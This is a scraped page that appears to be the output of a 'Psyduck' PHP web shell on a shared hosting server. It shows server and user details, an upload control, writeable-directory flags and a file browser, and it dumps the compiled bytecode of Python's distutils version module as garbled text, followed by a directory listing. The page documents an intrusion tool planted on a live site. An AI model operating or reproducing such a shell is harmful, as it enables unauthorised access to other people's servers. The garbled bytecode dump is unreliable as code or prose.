Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /opt/alt/python33/lib64/python3.3/distutils/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/python33/lib64/python3.3/distutils/__pycache__/version.cpython-33.pyc
�
��f�0c@sUdZddlZGdd�d�ZGdd�de�ZGdd�de�ZdS(	u�Provides classes to represent module version numbers (one class for
each style of version numbering).  There are currently two such classes
implemented: StrictVersion and LooseVersion.

Every version number class implements the following interface:
  * the 'parse' method takes a string and parses it to some internal
    representation; if the string is an invalid version number,
    'parse' raises a ValueError exception
  * the class constructor takes an optional string argument which,
    if supplied, is passed to 'parse'
  * __str__ reconstructs the string that was passed to 'parse' (or
    an equivalent string -- ie. one that will generate an equivalent
    version number instance)
  * __repr__ generates Python code to recreate the version number instance
  * _cmp compares the current instance with either another instance
    of the same class or a string (which will be parsed to an instance
    of the same class, thus must follow the same rules)
iNcBs}|EeZdZdZddd�Zdd�Zdd�Zdd	�Zd
d�Z	dd
�Z
dd�Zdd�ZdS(uVersionu�Abstract base class for version numbering classes.  Just provides
    constructor (__init__) and reproducer (__repr__), because those
    seem to be the same for all version numbering classes; and route
    rich comparisons to _cmp.
    cCs|r|j|�ndS(N(uparse(uselfuvstring((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__init__&suVersion.__init__cCsd|jjt|�fS(Nu	%s ('%s')(u	__class__u__name__ustr(uself((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__repr__*suVersion.__repr__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__eq__-suVersion.__eq__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__ne__3suVersion.__ne__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__lt__9suVersion.__lt__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__le__?suVersion.__le__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__gt__EsuVersion.__gt__cCs)|j|�}|tkr|S|dkS(Ni(u_cmpuNotImplemented(uselfuotheruc((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__ge__KsuVersion.__ge__N(
u__name__u
__module__u__qualname__u__doc__uNoneu__init__u__repr__u__eq__u__ne__u__lt__u__le__u__gt__u__ge__(u
__locals__((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyuVersionsuVersioncBsZ|EeZdZdZejdejejB�Zdd�Z	dd�Z
dd�Zd	S(
u
StrictVersionu?Version numbering for anal retentives and software idealists.
    Implements the standard interface for version number classes as
    described above.  A version number consists of two or three
    dot-separated numeric components, with an optional "pre-release" tag
    on the end.  The pre-release tag consists of the letter 'a' or 'b'
    followed by a number.  If the numeric components of two version
    numbers are equal, then one with a pre-release tag will always
    be deemed earlier (lesser) than one without.

    The following are valid version numbers (shown in the order that
    would be obtained by sorting according to the supplied cmp function):

        0.4       0.4.0  (these two are equivalent)
        0.4.1
        0.5a1
        0.5b3
        0.5
        0.9.6
        1.0
        1.0.4a3
        1.0.4b1
        1.0.4

    The following are examples of invalid version numbers:

        1
        2.7.2.2
        1.3.a4
        1.3pl1
        1.3c4

    The rationale for this version numbering system will be explained
    in the distutils documentation.
    u)^(\d+) \. (\d+) (\. (\d+))? ([ab](\d+))?$cCs�|jj|�}|s+td|��n|jddddd�\}}}}}|rttt|||g��|_n"ttt||g��d|_|r�|dt|�f|_n	d|_dS(	Nuinvalid version number '%s'iiiiii(i(
u
version_reumatchu
ValueErrorugrouputupleumapuintuversionu
prereleaseuNone(uselfuvstringumatchumajoruminorupatchu
prereleaseuprerelease_num((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyuparse�s*$"uStrictVersion.parsecCs�|jddkr;djtt|jdd���}ndjtt|j��}|jr�||jdt|jd�}n|S(Niiu.i(uversionujoinumapustru
prerelease(uselfuvstring((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__str__�s(	%uStrictVersion.__str__cCs�t|t�rt|�}n|j|jkrM|j|jkrFdSdSn|jre|jredS|jr||jr|dS|jr�|jr�dS|jr�|jr�|j|jkr�dS|j|jkr�dSdSnds�td��dS(Niiunever get herei����i����i����F(u
isinstanceustru
StrictVersionuversionu
prereleaseuFalseuAssertionError(uselfuother((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu_cmp�s&uStrictVersion._cmpN(u__name__u
__module__u__qualname__u__doc__ureucompileuVERBOSEuASCIIu
version_reuparseu__str__u_cmp(u
__locals__((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu
StrictVersioncs#	
u
StrictVersioncBsn|EeZdZdZejdej�Zd
dd�Z	dd�Z
dd�Zd	d
�Zdd�Z
d
S(uLooseVersionu�Version numbering for anarchists and software realists.
    Implements the standard interface for version number classes as
    described above.  A version number consists of a series of numbers,
    separated by either periods or strings of letters.  When comparing
    version numbers, the numeric components will be compared
    numerically, and the alphabetic components lexically.  The following
    are all valid version numbers, in no particular order:

        1.5.1
        1.5.2b2
        161
        3.10a
        8.02
        3.4j
        1996.07.12
        3.2.pl0
        3.1.1.6
        2g6
        11g
        0.960923
        2.2beta29
        1.13++
        5.5.kw
        2.0b1pl0

    In fact, there is no such thing as an invalid version number under
    this scheme; the rules for comparison are simple and predictable,
    but may not always give the results you want (for some definition
    of "want").
    u(\d+ | [a-z]+ | \.)cCs|r|j|�ndS(N(uparse(uselfuvstring((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__init__4suLooseVersion.__init__cCs{||_dd�|jj|�D�}xCt|�D]5\}}yt|�||<Wq5tk
riYq5Xq5W||_dS(NcSs(g|]}|r|dkr|�qS(u.((u.0ux((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu
<listcomp>>s	u&LooseVersion.parse.<locals>.<listcomp>(uvstringucomponent_reusplitu	enumerateuintu
ValueErroruversion(uselfuvstringu
componentsuiuobj((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyuparse9s	
	uLooseVersion.parsecCs|jS(N(uvstring(uself((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__str__IsuLooseVersion.__str__cCsdt|�S(NuLooseVersion ('%s')(ustr(uself((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu__repr__MsuLooseVersion.__repr__cCsdt|t�rt|�}n|j|jkr4dS|j|jkrJdS|j|jkr`dSdS(Niii����(u
isinstanceustruLooseVersionuversion(uselfuother((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu_cmpQsuLooseVersion._cmpN(u__name__u
__module__u__qualname__u__doc__ureucompileuVERBOSEucomponent_reuNoneu__init__uparseu__str__u__repr__u_cmp(u
__locals__((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyuLooseVersionsuLooseVersion(u__doc__ureuVersionu
StrictVersionuLooseVersion(((u6/opt/alt/python33/lib64/python3.3/distutils/version.pyu<module>sD�
Name
Size
Permissions
Options
__init__.cpython-33.pyc
0.432 KB
-rw-r--r--
__init__.cpython-33.pyo
0.432 KB
-rw-r--r--
archive_util.cpython-33.pyc
6.42 KB
-rw-r--r--
archive_util.cpython-33.pyo
6.42 KB
-rw-r--r--
bcppcompiler.cpython-33.pyc
9.38 KB
-rw-r--r--
bcppcompiler.cpython-33.pyo
9.38 KB
-rw-r--r--
ccompiler.cpython-33.pyc
42.924 KB
-rw-r--r--
ccompiler.cpython-33.pyo
42.676 KB
-rw-r--r--
cmd.cpython-33.pyc
20.176 KB
-rw-r--r--
cmd.cpython-33.pyo
20.176 KB
-rw-r--r--
config.cpython-33.pyc
4.987 KB
-rw-r--r--
config.cpython-33.pyo
4.987 KB
-rw-r--r--
core.cpython-33.pyc
8.21 KB
-rw-r--r--
core.cpython-33.pyo
8.21 KB
-rw-r--r--
cygwinccompiler.cpython-33.pyc
11.874 KB
-rw-r--r--
cygwinccompiler.cpython-33.pyo
11.874 KB
-rw-r--r--
debug.cpython-33.pyc
0.235 KB
-rw-r--r--
debug.cpython-33.pyo
0.235 KB
-rw-r--r--
dep_util.cpython-33.pyc
3.292 KB
-rw-r--r--
dep_util.cpython-33.pyo
3.292 KB
-rw-r--r--
dir_util.cpython-33.pyc
7.353 KB
-rw-r--r--
dir_util.cpython-33.pyo
7.353 KB
-rw-r--r--
dist.cpython-33.pyc
47.759 KB
-rw-r--r--
dist.cpython-33.pyo
47.759 KB
-rw-r--r--
emxccompiler.cpython-33.pyc
8.374 KB
-rw-r--r--
emxccompiler.cpython-33.pyo
8.374 KB
-rw-r--r--
errors.cpython-33.pyc
8.803 KB
-rw-r--r--
errors.cpython-33.pyo
8.803 KB
-rw-r--r--
extension.cpython-33.pyc
8.338 KB
-rw-r--r--
extension.cpython-33.pyo
8.338 KB
-rw-r--r--
fancy_getopt.cpython-33.pyc
14.666 KB
-rw-r--r--
fancy_getopt.cpython-33.pyo
14.464 KB
-rw-r--r--
file_util.cpython-33.pyc
7.16 KB
-rw-r--r--
file_util.cpython-33.pyo
7.16 KB
-rw-r--r--
filelist.cpython-33.pyc
12.759 KB
-rw-r--r--
filelist.cpython-33.pyo
12.759 KB
-rw-r--r--
log.cpython-33.pyc
3.6 KB
-rw-r--r--
log.cpython-33.pyo
3.6 KB
-rw-r--r--
msvc9compiler.cpython-33.pyc
25.019 KB
-rw-r--r--
msvc9compiler.cpython-33.pyo
24.947 KB
-rw-r--r--
msvccompiler.cpython-33.pyc
20.667 KB
-rw-r--r--
msvccompiler.cpython-33.pyo
20.667 KB
-rw-r--r--
spawn.cpython-33.pyc
7.534 KB
-rw-r--r--
spawn.cpython-33.pyo
7.534 KB
-rw-r--r--
sysconfig.cpython-33.pyc
17.709 KB
-rw-r--r--
sysconfig.cpython-33.pyo
17.709 KB
-rw-r--r--
text_file.cpython-33.pyc
10.121 KB
-rw-r--r--
text_file.cpython-33.pyo
10.121 KB
-rw-r--r--
unixccompiler.cpython-33.pyc
9.739 KB
-rw-r--r--
unixccompiler.cpython-33.pyo
9.739 KB
-rw-r--r--
util.cpython-33.pyc
20.001 KB
-rw-r--r--
util.cpython-33.pyo
20.001 KB
-rw-r--r--
version.cpython-33.pyc
10.059 KB
-rw-r--r--
version.cpython-33.pyo
9.993 KB
-rw-r--r--
versionpredicate.cpython-33.pyc
6.481 KB
-rw-r--r--
versionpredicate.cpython-33.pyo
6.481 KB
-rw-r--r--